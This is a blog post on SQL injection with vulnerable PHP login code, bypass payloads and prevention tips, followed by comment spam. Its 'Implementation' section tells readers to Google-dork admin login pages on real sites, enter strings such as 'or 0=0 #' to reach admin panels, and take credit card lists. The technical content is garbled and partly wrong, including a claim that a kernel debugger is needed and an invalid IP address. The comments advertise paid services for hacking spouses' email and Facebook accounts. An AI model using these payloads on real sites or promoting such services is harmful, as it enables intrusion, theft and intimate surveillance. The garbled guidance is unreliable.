SQL injection is a exploit type in which the attacker adds SQL (Structured Query Language) code to a Web form input box or web address for gaining access to server database. SQL injection comes when the attacker can insert some SQL statement to the 'query' with the data input manipulation to application page.
SQL Injection can be used when the input box has no character filter such as quotes character and double minus character. Hakcer can insert a SQL commands into a parameter and a form.
SQL Injection dangerous
1) This technique allows someone can log into the system without having any account.
2) SQL injection also allows hacker to delete, or add the some database record. This cause miss server function.
To perform SQL Injection, just needs a browser, Personal computer with internet connection and a kernel mode debugger software such as softice
SQL Injection Syntax with PHP :
1) $ SQL = "select * from login where username = '$ username' and password = '$ password'", (from GET or POST variable)
2) Input the string with the password 'or''='
3) Then the SQL result = "select * from login where username = '$ username' and password = 'pass' or'='";, (with this selection, the results will always be TRUE)
4) then we can inject SQL Syntax (in this case OR) to SQL
SQL Injection Syntax :
1) SQL string syntax '-- after the username
2) Database Query initial:
Select * from user where name = 'bob' and password = 'robot'
Changed to:
select * from user where name = 'bob'--'and password ='xxx'
Example : SQL Injection Syntax :
SQL Injection via the URL, for example:
http://10.344.102.233/web1/index.php?option=product.php&status=1; update cost order set ordered where = 50 = 9;
To prevent SQL Injection :
1) Changing the script php
2) Using MySQL_escape_string
3) Filtering Characters' and modify the php.ini
1. To modify PHP script :
Example of the php script:
$ query = "select id, name, email, password, type, a block from the user."
"where email = '$ Email' and password = '$ password'";
$ result = mySQL_query ($ query, $ id_mySQL);
while ($ row = mysql_fetch_row ($ result))
(
$ Id = $ row [0];
$ name = $ row [1];
$ email = $ row [2];
$ password = $ row [3];
$ type = $ row [4];
$ block = $ row [5];
)
if (strcmp ($ block, 'yes') == 0)
(
echo " \ n ";
exit ();
)
else if (! empty ($ Id) & &! empty ($ name) & &! empty ($ email) & &! empty ($ password));
The script above allows someone to log in with SQL commands into a login form. When the hacker insert character 'or''=' into the email Account form then cause query as below:
select idname, email, password, type, a block from where the user email = "or" = "and password =" or "="
So, change the script as below:
$ query = "select id, name, email, password, type, a block from the user."
"where email = '$ Email'";
$ result = mySQL_query ($ query, $ id_mySQL);
while ($ row = mysql_fetch_row ($ result))
(
$ Id = $ row [0];
$ name = $ row [1];
$ email = $ row [2];
$ password = $ row [3];
$ type = $ row [4];
$ block = $ row [5];
)
if (strcmp ($ block, 'yes') == 0)
(
echo " \ n ";
exit ();
)
$ pass = md5 ($ password);
else if ((strcmp ($ Email, $ email) == 0) & & strcmp ($ pass, $ password) == 0));
2. Using MySQL_escape_string
Change the character string that contains ' tobe \ '. Example: injec'tion become injec\' tion. Example:
$ map = "SQL injec'tion";
$ filter = mySQL_escape_string ($ chart);
echo "Result filter: $ filter";
3. Filtering characters' and modify the php.ini
Modify the the php.ini variables with magic_quotes enable. This causes PHP turn the string and characters' into \ 'automatically
Script Example for filtering input:
function validatepassword (input)
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true
for i = 1 to len (input)
c = mid (input, i, 1)
if (InStr (good_password_chars, c) = 0) then
validatepassword = false
exit function
end if
next
end function
SQL Injection Implementation
1) Go to Google or the other browsers :
2) Enter a keyword below :
"/ admin.asp"
"/ login.asp"
"/ logon.asp"
"/ adminlogin.asp"
"/ adminlogon.asp"
"/ admin_login.asp"
"/ admin_logon.asp"
"/ admin / admin.asp"
"/ admin / login.asp"
"/ admin / logon.asp"
(you can add your own suit)
3) Open up one of the links found by google, it's likely you will see a login page (user name and password).
4) Enter the following code:
User name: `or` a '=' a
Password: `or` a '=' a
5) If You are lucky, you will get the admin panel, where you can add or delete record as you want. And others, you can get a list of the many credit card.
6) If it does not work, try searching for the other links found by Google.
7) Many code variations that can bi used, among others:
User name: admin
Password: `or` a '=' a
or :
'Or 0 = 0 -; "or 0 = 0 -, or 0 = 0 -' or 0 = 0 #;
"Or 0 = 0 # 'or'x' = 'x;" or "x" = "x') or ( 'x' = 'x
Other method to prevent SQL INJECTION :
1) Limit the input box length
2) Filter input
3) Turn off or hide error messages
4) Turn off the standard facilities such as Stored Procedures, Extended Stored Procedures
5) Change "Startup and run SQL Server" using low privileged users in the SQL Server Security tab.
Source :
securiteam
greensql
ferruh.mavituna
January 20, 2009 1:52 AM
i like your site & i m intrested in link ex-change if you also do the same plz leave a comment on my site
reddhacking.blogspot.com
February 6, 2009 2:39 PM
Excellent, professional, and very fast service that's crack password facebook. Thank http://www.rayahari.com/how-to-hack-facebook-passwords.php very much . I know the truth now, although it is not as bas as I feared. By knowing the truth, I am hoping to be able to same my marriage since by seeing what is in the inbox, I know that the marriage is worth to be saved. I pray for the peace of all cheated spouses in the whole world... this service is something that faithful spouses can depend on to find the and to find peace.. If you are unsure of facebook password hacking , you can visit www.rayahari.com
BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.
Diane Calhoun, Lincoln
England
March 19, 2009 2:53 PM
http://www.activehackers.com/ are reliable!
Their service hacking hotmail passwords is incredible!
I was a little antsy waiting for know hacking hotmail passwords but once I got the email that they had gotten in and I saw the proof my heart dropped! Within minutes of making the payment I had the password! This is real, not no gimmick! I highly recommend these guys! I know ppl are always iffy about trusting such a site, but I was desparate and said FUCK IT thank goodness that RayaHari.com is legit!
I thank a bunch, RayaHari is the BEST!!!!!
hack into facebook account - hack into yahoo
where can i find a program to hack yahoo - best free way to hack hotmail password
Paula Robinson, New York
US
April 18, 2009 7:48 AM
Sayimg about Hacking Hotmail Passwords, I'm so glad I found this site hacking hotmail passwords from ActiveHackers.com ! I first suspected my husband was cheating 3 years ago, in fact even my friends thought he was, but I was not willing to confront him in case I was wrong. You from http://www.activehackers.com/ helped me find the proof I needed and, in fact, I've found out even more startling news about him lying to the person he has been having an affair with! Where does it end? I should have never married him. Well, at least my 8 year mistake is now over and I'm moving on. Thank you hacking hotmail passwords
To hack Facebook Passwords, i recommend this site RayaHari.com and this site MilanoRosa.com to hack into Yahoo Passwords and MySpace account
how do i hack into someone yahoo for free - program to hack yahoo accounts-- Emily W, Salem, Oregon
April 18, 2009 7:50 AM
Hi, guys, my husband changed about a year ago, he just seemed to go cold and unloving and I didn't know why. I suspected that he may be having an affair and after hiring http://www.activehackers.com/, I discovered that he was cheating on me with a woman from his work. They had been renting motels and using them during lunch times. I'm not the smartest person in the world but to hacking hotmail passwords, if I can do it using the information hacking hotmail passwords from ActiveHackers.com, anyone can!
crack facebook password - how to hack into yahoo
where can i find a program to hack yahoo - best free way to hack hotmail password
-- Mary T, Glendale, AZ
April 21, 2009 10:21 AM
Do you know hacking hotmail passwords? This was a fantastic service from http://www.activehackers.com/. So fast and they delivered exactly what they promised. I would definitely use them again. Thoroughly recommend. Thank for RayaHari.com extremely professional. Efficient and accurate service. I look forward to using your services again in the very near future. hacking password facebook You Can Do This In Five Minutes.
hack into facebook account - hack into yahoo
where can i find a program to hack yahoo - best free way to hack hotmail password
Paula Robinson, Lincoln
England
April 21, 2009 10:30 AM
I found these people reliable, efficient and not too expensive to hacking hotmail passwords . I found a bunch of places where people offer their services to hacking password facebook. It costs a lot! Has anyone ever used http://www.activehackers.com/ hacking services? They are really professional in hacking email password. I would recommend them. Thank you.
hack into facebook account - hack into yahoo
where can i find a program to hack yahoo - best free way to hack hotmail password
Paula Robinson, Lincoln
England
May 22, 2009 2:25 PM
yahoo hacking password? Dont worry, this rayahari.com does not ask you any information about you. They ask you only to provide nick name when you fill out the request form. They were fast and amazing and you got the information hack into yahoo account that was needed. Thank so much !
http://www.cheapcrack.net/hack-facebook-password.html
BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.
Diane Calhoun, Lincoln
England
May 26, 2009 10:20 AM
I found these people reliable, efficient and not too expensive to hack into yahoo account . I found a bunch of places where people offer their services to yahoo hacking password. It costs a lot! Has anyone ever used http://www.cheapcrack.net/hack-facebook-password.html hacking services? They are really professional in hacking email password. I would recommend them. Thank you.
BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.
Diane Calhoun, Lincoln
England
May 26, 2009 2:11 PM
yahoo password hacking? The services from http://www.cheapcrack.net/hack-facebook-password.html is absolutely works! Don't know how they do it, but who cares?! I had confirmation screen shots sent to me. They use a secure third-party credit card billing company so I feel safe with the transaction. I love this MilanoRosa.com service, specially price is very low to yahoo hacking password. The password they sent works perfectly! Unfortunately I found out my wife is having an affair, but now at least I have a chance to save our marriage. I hired other hacking services to hack into yahoo passwords, I spent alot of money but all in vain. MilanoRosa.com got me the real pasword in less than 2 days. I am very excited now yahoooooooooo...... Knowledge is power! Thanks CheapCrack.net!
BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.
Diane Calhoun, Lincoln
England
May 27, 2009 2:12 PM
http://www.cheapcrack.net/hack-facebook-password.html is one of the best email hacking services on internet today. They know yahoo hacker password very rapid turn around and also extremely professional. Would certainly recommend the service to friends. Fast work-within 48 hours! I tried another website and it took them over 2 weeks! I would like to say MilanoRosa.com service is excellent, only after a short period of time I received the password, I would definitely use yahoo hacking password in the future, very professional. Thank http://www.cheapcrack.net/hack-facebook-password.html
BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.
Diane Calhoun, Lincoln
England
June 2, 2009 2:40 PM
hack into yahoo account FIND WHETHER HE REALLY MERITS THE DISTRUST…
You can know EVERYTHING if you know their Email Password.
All you need to do is to goto http://www.activehackers.com . http://www.milanorosa.net/facebook-hacking-tools.php
WHAT’S INSIDE THEIR EMAILS?
WHOM DO THEY EMAIL, OR KEEP IN TOUCH WITH OVER THE INTERNET?
http://www.activehackers.com is used by people worldwide who want to HACK, CRACK someone's Yahoo, Hotmail, Rediffmail, Gmail, AOL or any other email password for an affordable sum of $200 USD flat .
Some of the important details are:-
1- They get the original password the victim is using.
2- After getting the password, they provide you with solid proofs.
3- Payment is made ONLY AFTER you are convinced with the proofs they send you.
4- You are required to pay through various methods ,including westernunion , moneygram , paypal , e-gold, moneybookers etc.
5- With enhanced support , solid background and professional lookout , it is by far the best solution to your hacking needs.
6- For more details, just goto http://www.activehackers.com yahoo hacking password
We GUARANTEE that the entire process is completely safe, secure, confidential...and fast. You will get the password within 36 hrs after requesting through http://activehackers.com ...!!
Regards,
Active Hacker
http://activehackers.com
June 3, 2009 4:15 PM
Do you want to know hacking passwords hotmail?! Thank this guys ActiveHackers.com http://www.activehackers.com/ for providing such an intelligent and insightful service. I orders last week and followed the instructions to hacking hotmail passwords. It helped me discover concrete evidence of my husband's year long affair with his secretary. I've realized this nightmare marriage was a huge mistake, luckily I'm young and will be all the better for it!
hack facebook profiles - hack yahoo passwords
where can i find a program to hack yahoo - best free way to hack hotmail password
-- Rose P, San Diego, CA
June 4, 2009 6:45 PM
Excellent, professional, and very fast service that's hacking hotmail passwords. Thank http://www.activehackers.com/ very much . I know the truth now, although it is not as bas as I feared. By knowing the truth, I am hoping to be able to same my marriage since by seeing what is in the inbox, I know that the marriage is worth to be saved. I pray for the peace of all cheated spouses in the whole world... this service is something that faithful spouses can depend on to find the and to find peace.. If you are unsure of hacking hotmail passwords , you can visit www.rayahari.com
hack into facebook account - hack into yahoo
where can i find a program to hack yahoo - how we hack facebook ids and password
Paula Robinson, Lincoln
England
June 9, 2009 2:47 PM
Hi Guys, I am just writing to say that you can find help at this site http://www.activehackers.com/ to hacking passwords hotmail. Thank you guys. If it wasnt for you I would probably still be none the wiser that my fiance was cheating on me. And to think we were about to get married! I have no idea what she was thinking or why she was going to marry me, given she was having an affair. Anyway, I ve ended things by hiring ActiveHackers.com to hacking hotmail passwords and there is no way in hell Im ever going have her back. Thanks again - you saved me a massive mistake!
facebook password hacking - hack someones yahoo
how do i hack into someone yahoo for free - program to hack yahoo accounts
-- Josh B, Brunswick, GA
New comments are not allowed.